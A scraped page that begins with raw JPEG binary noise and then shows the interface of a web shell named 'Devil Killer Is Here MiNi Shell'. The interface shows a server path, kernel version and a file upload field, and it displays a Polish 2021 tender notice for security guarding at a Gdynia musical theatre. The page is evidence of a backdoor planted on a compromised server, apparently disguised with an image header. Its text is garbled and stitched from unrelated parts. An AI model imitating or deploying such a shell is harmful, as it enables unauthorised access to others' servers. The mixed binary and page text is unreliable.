JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211220/0032219001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona fizyczna osób, mienia oraz monitoring obiektów Teatru Muzycznego im. Danuty Baduszkowej w Gdyni </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Teatr Muzyczny im.Danuty Baduszkowej w Gdyni</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000283386</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Grunwaldzki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-372</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@bozp.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.muzyczny.org/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona fizyczna osób, mienia oraz monitoring obiektów Teatru Muzycznego im. Danuty Baduszkowej w Gdyni </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8d2878d-6170-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00322190</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001466/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ochrona fizyczna osób, mienia oraz monitoring obiektów Teatru Muzycznego im. Danuty Baduszkowej w Gdyni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://tmgdynia.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w<br/>formie i postaci elektronicznej za pośrednictwem platformy zakupowej eZamawiajacy.pl (dalej jako<br/>„Platforma”), której operatorem jest Marketplanet (Otwarty Rynek Elektroniczny), pod adresem:<br/>https://tmgdynia.ezamawiajacy.pl/ na stronie prowadzonego postępowania.2. W postępowaniu o<br/>udzielenie zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu<br/>Platformy oraz poczty elektronicznej: biuro@bozp.com.pl. Link do postępowania dostępny jest na<br/>stronie internetowej zamawiającego: http://bip.tmgdynia.nv.pl/m,53,przetargi.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wymagania techniczne i organizacyjne opisane zostały w instrukcjach korzystania z Platformy, pod<br/>linkiem https://tmgdynia.ezamawiajacy.pl/ na stronie głównej w zakładce „Regulacje i procedury<br/>procesu zakupowego”.2. Niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na<br/>Platformie, tj.:1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s;2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel<br/>IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje;3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w<br/>najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;4) Włączona obsługa<br/>JavaScript;5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.3.<br/>Ofertę oraz oświadczenie, o którym mowa w § 6 ust. 1 SWZ, składa się, pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. W procesie składania oferty i dokumentów na platformie, kwalifikowany podpis<br/>elektroniczny, lub podpis zaufany lub podpis osobisty wykonawca składa bezpośrednio na<br/>dokumencie, który następnie przesyła do systemu. Zamawiający zaleca umieszczenie podpisu na<br/>każdym załączonym pliku osobno.4. Formaty plików:1) rozszerzenia plików wykorzystywanych przez<br/>wykonawców powinny być zgodne z Załącznikiem nr 2 do „Rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych” (t.j.Dz.U. z 2017 r. poz. 2247), zwanego dalej Rozporządzeniem KRI;2) zamawiający rekomenduje<br/>wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf;3) w<br/>celu ewentualnej kompresji danych zamawiający rekomenduje wykorzystanie jednego z rozszerzeń:<br/>.zip, .7Z;4) Uwaga! W Rozporządzeniu KRI nie występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich formatach zostaną uznane za złożone nieskutecznie;5) zamawiający zwraca uwagę<br/>na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB,<br/>oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania<br/>podpisu osobistego, który wynosi maksymalnie 5MB.6) Maksymalny rozmiar załączanego na<br/>Platformie pliku to 400Mb. Przy załączaniu dużych plików należy uwzględnić czas, jaki jest potrzebny<br/>na przesłanie pliku.5. Ofertę należy umieścić na Platformie pod adresem:<br/>https://tmgdynia.ezamawiajacy.pl/ na stronie prowadzonego postępowania.6. Składanie oświadczeń,<br/>zawiadomień oraz przekazywanie informacji, innych niż oferta i oświadczenie wskazane w par. 6 ust. 1,<br/>odbywa się przy użyciu środków komunikacji elektronicznej, pocztą elektroniczną na adres:<br/>biuro@bozp.com.pl lub na Platformie za pośrednictwem sekcji: „Pytania i odpowiedzi”. Za datę<br/>przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.7. Zamawiający będzie przekazywał wykonawcom informacje w formie<br/>elektronicznej za pośrednictwem Platformy lub poczty elektronicznej. Informacje dotyczące odpowiedzi<br/>na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert, informacje z otwarcia ofert,<br/>zamawiający będzie zamieszczał na platformie w odpowiedniej sekcji. Korespondencja, której zgodnie<br/>z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie<br/>elektronicznej za pośrednictwem Platformy do konkretnego wykonawcy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), dalej „RODO” (Dz. Urz.<br/>UE L 119 z 04.05.2016), Zamawiający informuje, że:<br/>1) administratorem danych osobowych przekazywanych w ramach tego postępowania jest Teatr<br/>Muzyczny im. Danuty Baduszkowej w Gdyni;<br/>2) inspektorem danych osobowych w Teatrze Muzycznym im. Danuty Baduszkowej w Gdyni jest pan<br/>Mateusz Gigiewicz, kontakt e-mail: iod@muzyczny.org, tel.: 58 785 58 44, kom.: 519 156 165;<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego 1/PN/TE/2021 w trybie podstawowym;<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5) dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO;<br/>8) osoba której dane osobowe Zamawiający pozyska ma prawo :<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania danych osobowych <br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna że przetwarzanie danych osobowych jego dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje wykonawcy:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Zamawiający może żądać od osoby, której dane osobowe dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowania żądania dostępu do danych, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego.<br/>Skorzystanie z prawa do sprostowania lub uzupełnienia danych nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.<br/>Żądanie ograniczenia przetwarzania danych nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia danego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">3/PN/TE/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 995456,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usługi ochrony fizycznej osób, mienia oraz<br/>monitoring obiektów Teatru Muzycznego im. Danuty Baduszkowej w Gdyni przy Placu<br/>Grunwaldzkim 1.<br/>2. Usługa obejmuje ochronę obiektów Teatru Muzycznego w Gdyni przed kradzieżą i<br/>niszczeniem mienia, poprzez zabezpieczenie ich przez pracowników ochrony, jednolicie<br/>umundurowanych i noszących plakietki identyfikacyjne z nazwą firmy oraz danymi personalnymi<br/>pracownika, wyposażonymi w środki przymusu bezpośredniego oraz środki łączności.<br/>3. Wykonawca zainstaluje na koszt własny system kontroli pracowników poprzez bezpośrednią<br/>rejestrację obchodów i transmisję sygnału w czasie rzeczywistym do własnego Centrum<br/>Dowodzenia;<br/>4. Wykonawca będzie świadczyć usługi ochrony w obsadzie składającej się z pracowników<br/>pełniących dyżur na recepcji służbowej, w systemie dwóch pracowników Ochrony, w tym jeden<br/>wykwalifikowany, przez 24 godziny na dobę w budynku Teatru Muzycznego w Gdyni.<br/>5. Wykonawca zobowiązany będzie świadczyć usługi w zakresie ochrony w obsadzie jednego lub dwóch ( jeśli będą grane w tym samym czasie spektakle na dwóch scenach) pracowników wykwalifikowanych w dziale Obsługi Widzów w dniach, w których wystawiane będą spektakle teatralne, rozpoczynając usługę godzinę przed spektaklem i kończąc 30 minut po zakończeniu spektaklu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Ochrona spektakli - Wykonawca zobowiązany będzie świadczyć usługi w zakresie ochrony w obsadzie jednego lub dwóch ( jeśli będą grane w tym samym czasie spektakle na dwóch scenach) pracowników kwalifikowanych w Dziale Obsługi Widzów w dniach, w których wystawiane będą spektakle teatralne, rozpoczynając usługę godzinę przed spektaklem i kończąc 30 minut po zakończeniu spektaklu;<br/>Teatr do końca każdego miesiąca będzie przekazywał Wykonawcy wykaz dni następnego miesiąca, w których wystawiane będą spektakle i konieczna będzie obecność pracownika/ów ochrony w Dziale Obsługi Widzów.<br/>Minimalny zakres opcji – 2000 godzin został wliczony do przedmiotu zamówienia, Zamawiający może zwiększyć tę liczbę w razie uzasadnionych potrzeb o maks. 50% <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-02-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty niepodlegające odrzuceniu oceniane będą na podstawie następujących kryteriów: <br/>1) cena oferty - 60% <br/>2) doświadczenie osób skierowanych do realizacji zamówienia – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający określa następujące minimalne warunki udziału w postępowaniu w zakresie uprawnień do prowadzenia określonej działalności gospodarczej:<br/>Wykonawca musi posiadać aktualną koncesję wydaną przez ministra właściwego do spraw wewnętrznych na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, wydaną na podstawie Ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz.U. z 2021r., poz. 1995). <br/>2. Zamawiający określa następujące minimalne warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej:<br/>1) Wykonawca w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje należycie:<br/>a) co najmniej 2 (dwie) usługi stałej, całodobowej fizycznej ochrony osób i mienia, świadczone w budynku/budynkach przeznaczonym na potrzeby kultury (sklasyfikowanych jako klasa 1261 lub 1262 PKOB), świadczone nieprzerwanie przez co najmniej 11 miesięcy, o wartości każdej usługi co najmniej 400.000,00 zł brutto.<br/>Przez jedną usługę Zamawiający rozumie jeden/ą kontrakt/umowę na rzecz jednego podmiotu, nawet jeśli odnosiły się one do świadczenia usługi w kilku budynkach.<br/>b) co najmniej 5 (pięć) usług polegających na fizycznej ochronie ochrony osób i mienia podczas imprez (spektakle, koncerty, happeningi, imprezy sportowe, i inne zorganizowane wydarzenia o charakterze kulturalnym lub rozrywkowym). z udziałem publiczności („publiczności” rozumianej jako zgromadzenie osób w jednym miejscu - miejscu organizacji imprezy, i czasie, uczestniczących w wydarzeniu na żywo). Za imprezę nie jest uważana wystawa, ekspozycja, z wyjątkiem jej wernisażu z udziałem publiczności. Za jedną usługę będzie uznawana ochrona jednej imprezy.<br/>2) Wykonawca skieruje do realizacji zamówienia następujące osoby:<br/>co najmniej 8 (ośmiu) pracowników ochrony, którzy będą pełnili służbę na chronionym obiekcie, całkowicie sprawnych fizycznie i psychicznie,<br/>- w tym: co najmniej 6 pracowników ochrony wpisanych na listę kwalifikowanych pracowników ochrony fizycznej prowadzoną przez Komendanta Głównego Policji, <br/>- w tym: co najmniej 2 dwóch pracowników ochrony posiadających doświadczenie w wykonywaniu usług stałej, całodobowej fizycznej ochrony osób i mienia, w budynku przeznaczonym na potrzeby kultury – należy wykazać co najmniej dwie usługi stałej, całodobowej fizycznej ochrony osób i mienia, świadczone w budynku przeznaczonym na potrzeby kultury (klasa 1261 lub 1262 PKOB), w których wykonywaniu brał udział wskazany pracownik, (przez jedną usługę Zamawiający rozumie jeden/ą kontrakt/umowę dla jednego odbiorcy), nawet jeśli odnosiły się one do świadczenia usługi w kilku budynkach<br/>- dodatkowo co najmniej dwóch kwalifikowanych pracowników ochrony będzie posiadało doświadczenie w zakresie fizycznej ochrony osób i mienia podczas imprez z udziałem publiczności (rozumianej analogicznie jak w warunku doświadczenia wykonawcy) - należy wykazać co najmniej dwie usługi w których wykonywaniu brał udział wskazany pracownik,<br/>3) Wykonawca dysponuje centrum monitoringu oraz co najmniej dwiema grupami patrolowo – interwencyjnymi, o czasie dojazdu do siedziby zamawiającego, nie dłuższym niż 5 minut w nocy oraz 10 minut w dzień,<br/>3. Zamawiający określa następujące minimalne warunki udziału w postępowaniu w zakresie sytuacji ekonomicznej lub finansowej:<br/>Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę gwarancyjną w odniesieniu do jednego zdarzenia i do wszystkich zdarzeń, których skutki są objęte umową ubezpieczenia OC, minimum 5.000.000,00 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, nie wcześniej niż w okresie ostatnich 4 lat (liczonych wstecz od dnia w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie 